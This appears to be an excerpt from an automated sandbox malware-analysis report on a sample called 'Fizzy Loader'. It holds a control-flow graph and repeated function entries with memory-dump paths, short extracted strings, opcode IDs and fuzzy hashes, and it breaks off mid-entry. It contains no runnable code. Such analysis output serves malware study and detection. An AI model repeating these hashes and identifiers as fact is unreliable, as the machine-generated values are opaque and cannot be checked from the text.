                                                                                                                                                            control_flow_graph 1478 7ff848f59a6f-7ff848f8314e 1481 7ff848f832c7-7ff848f832cd 1478->1481 1482 7ff848f83154-7ff848f8316b 1478->1482 1483 7ff848f832cf-7ff848f832dc 1481->1483 1484 7ff848f832e0-7ff848f832e3 1481->1484 1489 7ff848f8316d-7ff848f83171 1482->1489 1490 7ff848f831a5-7ff848f83207 call 7ff848f5d798 1482->1490 1483->1484 1491 7ff848f832de 1483->1491 1487 7ff848f8331b-7ff848f83321 1484->1487 1488 7ff848f832e5-7ff848f832ed 1484->1488 1495 7ff848f83334-7ff848f83337 1487->1495 1496 7ff848f83323-7ff848f83330 1487->1496 1492 7ff848f836b3-7ff848f836c9 1488->1492 1493 7ff848f832f3-7ff848f83318 1488->1493 1489->1492 1494 7ff848f83177-7ff848f83182 1489->1494 1528 7ff848f8320a-7ff848f8321d 1490->1528 1529 7ff848f83209 1490->1529 1491->1484 1516 7ff848f836cd-7ff848f83706 1492->1516 1517 7ff848f836cb 1492->1517 1493->1487 1501 7ff848f835ef-7ff848f83629 call 7ff848f624c0 1494->1501 1502 7ff848f83188-7ff848f83193 1494->1502 1498 7ff848f8336f-7ff848f83375 1495->1498 1499 7ff848f83339-7ff848f83341 1495->1499 1496->1495 1511 7ff848f83332 1496->1511 1506 7ff848f83389-7ff848f8338c 1498->1506 1507 7ff848f83377-7ff848f83387 1498->1507 1499->1492 1505 7ff848f83347-7ff848f8336c 1499->1505 1555 7ff848f83630-7ff848f8366a call 7ff848f624c0 1501->1555 1502->1490 1505->1498 1518 7ff848f8338e-7ff848f83394 1506->1518 1519 7ff848f833ad-7ff848f833b1 1506->1519 1507->1506 1511->1495 1522 7ff848f8370d-7ff848f83711 1516->1522 1517->1516 1517->1522 1524 7ff848f833a8-7ff848f833ab 1518->1524 1525 7ff848f83396-7ff848f833a6 1518->1525 1519->1492 1526 7ff848f833b7-7ff848f833c9 1519->1526 1531 7ff848f83726-7ff848f8372c 1522->1531 1532 7ff848f83713-7ff848f83724 1522->1532 1524->1519 1533 7ff848f833ec-7ff848f833f2 1524->1533 1525->1524 1534 7ff848f833cc-7ff848f833e9 1526->1534 1535 7ff848f833cb 1526->1535 1549 7ff848f8321f-7ff848f8323d 1528->1549 1550 7ff848f83259-7ff848f832c4 1528->1550 1529->1528 1537 7ff848f8372f-7ff848f8373d 1531->1537 1538 7ff848f8372e 1531->1538 1532->1531 1540 7ff848f83405-7ff848f83408 1533->1540 1541 7ff848f833f4-7ff848f83404 1533->1541 1534->1533 1535->1534 1556 7ff848f8376f-7ff848f83776 1537->1556 1557 7ff848f8373f-7ff848f83751 1537->1557 1538->1537 1545 7ff848f8340e-7ff848f83411 1540->1545 1546 7ff848f834a3-7ff848f834a9 1540->1546 1541->1540 1551 7ff848f83424-7ff848f8342f call 7ff848f59b48 1545->1551 1552 7ff848f83413-7ff848f83422 1545->1552 1553 7ff848f834bc-7ff848f834bf 1546->1553 1554 7ff848f834ab-7ff848f834bb 1546->1554 1569 7ff848f8323f 1549->1569 1570 7ff848f83240-7ff848f83253 1549->1570 1550->1481 1551->1555 1583 7ff848f83435-7ff848f83448 call 7ff848f59b48 1551->1583 1552->1551 1562 7ff848f8351a-7ff848f83520 1553->1562 1563 7ff848f834c1-7ff848f834c7 1553->1563 1554->1553 1608 7ff848f83671-7ff848f836b2 call 7ff848f624c0 1555->1608 1574 7ff848f83778-7ff848f83792 1556->1574 1575 7ff848f83777 1556->1575 1578 7ff848f83753-7ff848f83759 1557->1578 1579 7ff848f83762-7ff848f83768 1557->1579 1567 7ff848f83533-7ff848f83536 1562->1567 1568 7ff848f83522-7ff848f83532 1562->1568 1572 7ff848f834da-7ff848f834ed call 7ff848f59b48 1563->1572 1573 7ff848f834c9-7ff848f834d9 1563->1573 1581 7ff848f83537-7ff848f83542 1567->1581 1582 7ff848f835c2-7ff848f835c8 1567->1582 1568->1567 1569->1570 1570->1550 1607 7ff848f835e4-7ff848f835ee 1570->1607 1572->1492 1601 7ff848f834f3-7ff848f83517 1572->1601 1573->1572 1623 7ff848f83799-7ff848f837a4 1574->1623 1575->1574 1590 7ff848f8375c-7ff848f83760 1578->1590 1591 7ff848f8375b 1578->1591 1596 7ff848f8376b-7ff848f8376e 1579->1596 1597 7ff848f8376a 1579->1597 1594 7ff848f83555-7ff848f83561 1581->1594 1595 7ff848f83544-7ff848f83554 1581->1595 1592 7ff848f835db-7ff848f835de 1582->1592 1593 7ff848f835ca-7ff848f835da 1582->1593 1583->1492 1609 7ff848f8344e-7ff848f83476 call 7ff848f5d798 call 7ff848f59b48 1583->1609 1590->1556 1591->1590 1592->1607 1592->1608 1593->1592 1594->1492 1604 7ff848f83562-7ff848f83576 1594->1604 1595->1594 1596->1556 1597->1596 1601->1562 1613 7ff848f83578-7ff848f83582 1604->1613 1614 7ff848f83584-7ff848f83599 1604->1614 1608->1492 1609->1492 1631 7ff848f8347c-7ff848f834a0 1609->1631 1617 7ff848f835a0 1613->1617 1620 7ff848f8359b-7ff848f8359e 1614->1620 1621 7ff848f835a1-7ff848f835bf 1614->1621 1617->1621 1620->1617 1621->1582 1629 7ff848f837ab-7ff848f837ad 1623->1629 1632 7ff848f837af-7ff848f837b7 1629->1632 1633 7ff848f837b8-7ff848f837d6 call 7ff848f5d7b8 call 7ff848f5d7b0 1629->1633 1631->1546 1639 7ff848f837db-7ff848f837de 1633->1639 1640 7ff848f83905-7ff848f8390a 1639->1640 1641 7ff848f837e4-7ff848f83815 1639->1641 1642 7ff848f8390c-7ff848f8393e 1640->1642 1643 7ff848f83985-7ff848f8398d 1640->1643 1647 7ff848f838fc-7ff848f83904 call 7ff848f8398e 1641->1647 1648 7ff848f8381b-7ff848f83849 1641->1648 1650 7ff848f8397c-7ff848f83984 call 7ff848f839ca 1642->1650 1651 7ff848f83940-7ff848f8397a call 7ff848f5d8f0 1642->1651 1647->1640 1659 7ff848f8384b-7ff848f83862 1648->1659 1660 7ff848f8388a-7ff848f8389f 1648->1660 1650->1643 1651->1650 1666 7ff848f838de-7ff848f838f6 1659->1666 1668 7ff848f83864-7ff848f83886 call 7ff848f5d8f0 1659->1668 1660->1666 1667 7ff848f838a1-7ff848f838b8 1660->1667 1666->1647 1666->1648 1667->1666 1672 7ff848f838ba-7ff848f838dc call 7ff848f5d8f0 1667->1672 1677 7ff848f83888 1668->1677 1672->1666 1677->1666
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 8DI$`+I$lN_H
                                                                                                                                                            • API String ID: 0-994944539
                                                                                                                                                            • Opcode ID: d04cfe4827320a13269ec85a75dc10688c7f064efcb6cd752c83bb38c066bc0d
                                                                                                                                                            • Instruction ID: 29f28c5283419e447508ae5323d64bf3277731bc094d257845dd062d66a9a56f
                                                                                                                                                            • Opcode Fuzzy Hash: d04cfe4827320a13269ec85a75dc10688c7f064efcb6cd752c83bb38c066bc0d
                                                                                                                                                            • Instruction Fuzzy Hash: 2762D232E0DA4A4FEB99EB2C9455A7477D2EF99754F1800BEC44EC72E6DF24AC068344
                                                                                                                                                            Function 00007FF848F4BC0D Relevance: 4.5, Strings: 1, Instructions: 3211COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: aK_H
                                                                                                                                                            • API String ID: 0-2603984226
                                                                                                                                                            • Opcode ID: ebe139fb4f3e6c644e77dd8b27c79ddac8248eb40d81ce39440e6bc9d7d41e12
                                                                                                                                                            • Instruction ID: d08b1857a8eb8361a85a6b9c6a6c41c48a37f09bb156cc9d52514591051773c6
                                                                                                                                                            • Opcode Fuzzy Hash: ebe139fb4f3e6c644e77dd8b27c79ddac8248eb40d81ce39440e6bc9d7d41e12
                                                                                                                                                            • Instruction Fuzzy Hash: 8B43403060DA8A8FDB85FF28C458BA977E1FF69744F1405BAD40DDB296DE38A845CB00
                                                                                                                                                            Function 00007FF848F960A0 Relevance: 3.0, Strings: 2, Instructions: 536COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: +($F_^
                                                                                                                                                            • API String ID: 0-3088106727
                                                                                                                                                            • Opcode ID: c84b820a797d170d317dfb4aa858d9cbd94ab16b693b4bafb9ab74dd831f2e63
                                                                                                                                                            • Instruction ID: 04d59cf39a47eb16bd5ee85c5ccf1e500a5721eb715fb151b84d47fb97de9c2b
                                                                                                                                                            • Opcode Fuzzy Hash: c84b820a797d170d317dfb4aa858d9cbd94ab16b693b4bafb9ab74dd831f2e63
                                                                                                                                                            • Instruction Fuzzy Hash: A602B03191D64A8FEB94FB28D0907B677A1EF5139CF1441BAC08D8A1C7DF2DA886C794
                                                                                                                                                            Function 00007FF848F40E40 Relevance: 2.8, Strings: 2, Instructions: 291COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: HAH$HAH
                                                                                                                                                            • API String ID: 0-524784639
                                                                                                                                                            • Opcode ID: f66b6d97633369fa8db8897c60c409cb6544f7e442741c2aceee802c0589c00e
                                                                                                                                                            • Instruction ID: ba3e9765f0937eb76ffe75ba418f59d3310b13746d0f944009597bf3f5ff70df
                                                                                                                                                            • Opcode Fuzzy Hash: f66b6d97633369fa8db8897c60c409cb6544f7e442741c2aceee802c0589c00e
                                                                                                                                                            • Instruction Fuzzy Hash: B6811631A1CE494FE798EBAC94456B9B7E1FFA8791F04427BD00ED3295CF34A8468781
                                                                                                                                                            Function 00007FF848F49C65 Relevance: 2.2, Strings: 1, Instructions: 909COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: aH
                                                                                                                                                            • API String ID: 0-2191227055
                                                                                                                                                            • Opcode ID: d4e4004536a826c33cfbabdfdbd2c80b26bc9813a9997c51282c60b82a4f81a8
                                                                                                                                                            • Instruction ID: f650c5a63d42e4c4e5ab658cf2a6e91fcb72fdac32891d3269794d73fec3cd68
                                                                                                                                                            • Opcode Fuzzy Hash: d4e4004536a826c33cfbabdfdbd2c80b26bc9813a9997c51282c60b82a4f81a8
                                                                                                                                                            • Instruction Fuzzy Hash: AE529030B1EA4E4FEB89EB1C84547AA77E2FFA4B80F5441B6D00DD72D6DE2CA8418355
                                                                                                                                                            Function 00007FF848F53399 Relevance: 1.9, Strings: 1, Instructions: 686COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: aH
                                                                                                                                                            • API String ID: 0-2191227055
                                                                                                                                                            • Opcode ID: a209be7757d6347ffbc966b3c79bf36a7852c0af1d711b499f1eab936e8901e3
                                                                                                                                                            • Instruction ID: bfec59fdb8dcae22e17670da38fce2c4262415361c30f9c967de1f5ef6c93812
                                                                                                                                                            • Opcode Fuzzy Hash: a209be7757d6347ffbc966b3c79bf36a7852c0af1d711b499f1eab936e8901e3
                                                                                                                                                            • Instruction Fuzzy Hash: 42325270A0DA4E8FDB89EF2CC454AAAB7E2FF59340F5445A9D419C72D6CB34E842CB40
                                                                                                                                                            Function 00007FF848F8F890 Relevance: 1.9, Strings: 1, Instructions: 670COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: KG_^
                                                                                                                                                            • API String ID: 0-2842994189
                                                                                                                                                            • Opcode ID: f5b156465c170c2d2ec58b9578685c041957039852f052fd36b92d5ec976a2f0
                                                                                                                                                            • Instruction ID: b2fb76abaf237c8fd61ea89195a7fbe2ca1c5e79c92e113a70bfb7810e2d0c44
                                                                                                                                                            • Opcode Fuzzy Hash: f5b156465c170c2d2ec58b9578685c041957039852f052fd36b92d5ec976a2f0
                                                                                                                                                            • Instruction Fuzzy Hash: EF123737A0E5965FD755B73CA4915FA3BA0EF813A9F0802B7C58CCB183DE1C584A83A5
                                                                                                                                                            Function 00007FF848F5F94D Relevance: 1.9, Strings: 1, Instructions: 662COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: )J_L
                                                                                                                                                            • API String ID: 0-3275389854
                                                                                                                                                            • Opcode ID: 7103572321fec125dccc67af052ef356dd60a820e0745b84cb8bf0ffe6f772fb
                                                                                                                                                            • Instruction ID: a6b550b51606dbda9014c3497cb28f483f011016bd545742428a379ede70a1f3
                                                                                                                                                            • Opcode Fuzzy Hash: 7103572321fec125dccc67af052ef356dd60a820e0745b84cb8bf0ffe6f772fb
                                                                                                                                                            • Instruction Fuzzy Hash: 1512F232A1D9468FD758FB2CE0519EA77E1FFA4350B0406BAD04AC7297CF28F8468794
                                                                                                                                                            Function 00007FF848F509EE Relevance: 1.9, Strings: 1, Instructions: 610COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: H
                                                                                                                                                            • API String ID: 0-2852464175
                                                                                                                                                            • Opcode ID: 621c46c9783e002d4e329f7d9c0ca2f7ae9cb6d0a8feb3510cb048230bc69eaf
                                                                                                                                                            • Instruction ID: 046a0bba031380559665c48c280965aa66d5365e351ce4a3b8fb46ad6b3c91dc
                                                                                                                                                            • Opcode Fuzzy Hash: 621c46c9783e002d4e329f7d9c0ca2f7ae9cb6d0a8feb3510cb048230bc69eaf
                                                                                                                                                            • Instruction Fuzzy Hash: 33224230A18A4E8FDB98EF18C494AA9B7E1FF98344F544569D81EC72D6DF35E842CB40
                                                                                                                                                            Function 00007FF848F93D00 Relevance: 1.9, Strings: 1, Instructions: 601COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: aH_H
                                                                                                                                                            • API String ID: 0-2574457659
                                                                                                                                                            • Opcode ID: 114cbaffb62232cd2c5385908ae336ddd5298180c0b78a0bc5c49ecd0010fcb7
                                                                                                                                                            • Instruction ID: 3f285c531b5600aa38cbccb179414d476b0bcd2c3694c3f406a1a27c8b36f2ac
                                                                                                                                                            • Opcode Fuzzy Hash: 114cbaffb62232cd2c5385908ae336ddd5298180c0b78a0bc5c49ecd0010fcb7
                                                                                                                                                            • Instruction Fuzzy Hash: 3302CF30A1CA4A8FDB88EB18D455A75B7E2FFA9344F5445B9C04EC72C6CE24EC46CB85
                                                                                                                                                            Function 00007FF848F5F9FA Relevance: 1.8, Strings: 1, Instructions: 585COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: )J_L
                                                                                                                                                            • API String ID: 0-3275389854
                                                                                                                                                            • Opcode ID: e59ba79f86fcb09b89a142488e2f21c60b2e0fd111e7967476e2d28060000cbb
                                                                                                                                                            • Instruction ID: ca19f4c3d73575bc41dab5a3ddc492a7d755d21ebfce4a0d05a2744df1f03947
                                                                                                                                                            • Opcode Fuzzy Hash: e59ba79f86fcb09b89a142488e2f21c60b2e0fd111e7967476e2d28060000cbb
                                                                                                                                                            • Instruction Fuzzy Hash: C202C131A1DE469FD798FB28D0519A9B7E1FFA8350B0445BAD00AC72D7DF28F8468784
                                                                                                                                                            Function 00007FF848F7AD00 Relevance: 1.8, Strings: 1, Instructions: 565COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: d
                                                                                                                                                            • API String ID: 0-2564639436
                                                                                                                                                            • Opcode ID: a519d23b003fcb4af56706c8fceb77ac0d38327c517eab481e2a879b433c4602
                                                                                                                                                            • Instruction ID: badade62c3153d6ec50b7899b173e07a358d186f2145c6a320df821c1354431a
                                                                                                                                                            • Opcode Fuzzy Hash: a519d23b003fcb4af56706c8fceb77ac0d38327c517eab481e2a879b433c4602
                                                                                                                                                            • Instruction Fuzzy Hash: 7002B030A1CE098FE768EB18D485AB6B3E1FB95350F14457ED08EC3696DB35F8828785
                                                                                                                                                            Function 00007FF848F5ACA4 Relevance: 1.7, Strings: 1, Instructions: 495COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: I
                                                                                                                                                            • API String ID: 0-3707901625
                                                                                                                                                            • Opcode ID: d6e3acb73e07bd1f0099dea169d82b714a252c66c63f242f6b4199df7c39d07c
                                                                                                                                                            • Instruction ID: e6d8d3e245a0fbc68a9b6887e00652608375b88e967885f8e31d634966b5b30a
                                                                                                                                                            • Opcode Fuzzy Hash: d6e3acb73e07bd1f0099dea169d82b714a252c66c63f242f6b4199df7c39d07c
                                                                                                                                                            • Instruction Fuzzy Hash: C1E10431D1EACA4FE756A73858252E9BFF1EF46390F0801FAD488CB0D3DA1C595A8356
                                                                                                                                                            Function 00007FF848F4C450 Relevance: 1.7, Instructions: 1743COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 30f8401be2e0d73ed40dff60cc126123fd36912599861a6b08e2de53b6fb8b57
                                                                                                                                                            • Instruction ID: 40993a542a54103f3ad0c7c709b0ddc73454a4c66a46d25dbd7bdeb7845f7702
                                                                                                                                                            • Opcode Fuzzy Hash: 30f8401be2e0d73ed40dff60cc126123fd36912599861a6b08e2de53b6fb8b57
                                                                                                                                                            • Instruction Fuzzy Hash: 6AD2EE30A18A4A8FEBC5FB18C458BA973E2FF69780F1545B5D40DC72A6DE34EC858B05
                                                                                                                                                            Function 00007FF848F5415E Relevance: 1.7, Strings: 1, Instructions: 486COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: H
                                                                                                                                                            • API String ID: 0-2852464175
                                                                                                                                                            • Opcode ID: 981dfaa087023600ebd9265be4bf4dd9d1948d6290a077f37ffbceedfb4f2c27
                                                                                                                                                            • Instruction ID: 2a9ff4bea74e972868ff3548554bb9383fc97c6c2a2d2592c4423ebcc1c8c658
                                                                                                                                                            • Opcode Fuzzy Hash: 981dfaa087023600ebd9265be4bf4dd9d1948d6290a077f37ffbceedfb4f2c27
                                                                                                                                                            • Instruction Fuzzy Hash: 93024570A18A4E8FDBC8EF18C494AAAB7E1FF68354F5045A9D41DC72D6CB35E852CB40
                                                                                                                                                            Function 00007FF848F5D825 Relevance: 1.7, Strings: 1, Instructions: 468COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: HvH
                                                                                                                                                            • API String ID: 0-1294585305
                                                                                                                                                            • Opcode ID: e24e266dec2620fce02940bd890688a056f30d93dc426799865b69cc3925573d
                                                                                                                                                            • Instruction ID: 60c9ba6dfbc4a845f1482e70c4d78122921a36c1898e7c5a87877b0964076b2a
                                                                                                                                                            • Opcode Fuzzy Hash: e24e266dec2620fce02940bd890688a056f30d93dc426799865b69cc3925573d
                                                                                                                                                            • Instruction Fuzzy Hash: 8DE1AE30B1C9498FEB99EB2C8498BA577E1FF59340F0401BAD44ECB2A6DE28EC458745
                                                                                                                                                            Function 00007FF848F40E48 Relevance: 1.5, Strings: 1, Instructions: 283COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: HAH
                                                                                                                                                            • API String ID: 0-1579723087
                                                                                                                                                            • Opcode ID: dbcfc40406349e13c61cc4dfa080c084f27fecceb5532521a377ef031841fe2f
                                                                                                                                                            • Instruction ID: 4df38cd5aba389ac888e326267fbe3d75b38853c8ee388034930bbc5b6b480a0
                                                                                                                                                            • Opcode Fuzzy Hash: dbcfc40406349e13c61cc4dfa080c084f27fecceb5532521a377ef031841fe2f
                                                                                                                                                            • Instruction Fuzzy Hash: 36714931F1DB891FE348AB7C985617A77D1EF99A90F04027FE44DD32D3DE28A8024286
                                                                                                                                                            Function 00007FF848F5EE47 Relevance: 1.5, Strings: 1, Instructions: 229COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: _
                                                                                                                                                            • API String ID: 0-701932520
                                                                                                                                                            • Opcode ID: fa8db52151d67cd1e7ab09ccf251247357c37c92ae212000abe762c533f4efef
                                                                                                                                                            • Instruction ID: 9b15909b66456e00539fea57783bee4b88050bb046806f9903fc77dc9552fb61
                                                                                                                                                            • Opcode Fuzzy Hash: fa8db52151d67cd1e7ab09ccf251247357c37c92ae212000abe762c533f4efef
                                                                                                                                                            • Instruction Fuzzy Hash: 25512032B1CA444FE768E61CA8516FAB7D1EFC5364F0405BFD089C3183DE29A8068395
                                                                                                                                                            Function 00007FF848F4835E Relevance: 1.5, Strings: 1, Instructions: 228COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: K_^
                                                                                                                                                            • API String ID: 0-847152731
                                                                                                                                                            • Opcode ID: 04fa3aa1495d7dd83a32cdeba19ee7839062927d86a7ca35354e8d19025f8724
                                                                                                                                                            • Instruction ID: 9da98ce854d7adfb948d77755464b934f33085f802243549d8e7117ca7d86d40
                                                                                                                                                            • Opcode Fuzzy Hash: 04fa3aa1495d7dd83a32cdeba19ee7839062927d86a7ca35354e8d19025f8724
                                                                                                                                                            • Instruction Fuzzy Hash: D961233291E6DA0EE762A33458111F57FA0EF536A0F4901FBD48CDB1E3DA1D681A8396
                                                                                                                                                            Function 00007FF848F5F3F8 Relevance: 1.5, Strings: 1, Instructions: 210COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: PJ_^
                                                                                                                                                            • API String ID: 0-649389504
                                                                                                                                                            • Opcode ID: 2f6316aa01543cac5135542e3dc7bf901a21a431bad864fd46ebd88f04aac900
                                                                                                                                                            • Instruction ID: f9b7c58a04bca0537c2c337b0013d1c32346466c212d6b5974bfe86ed9e098b7
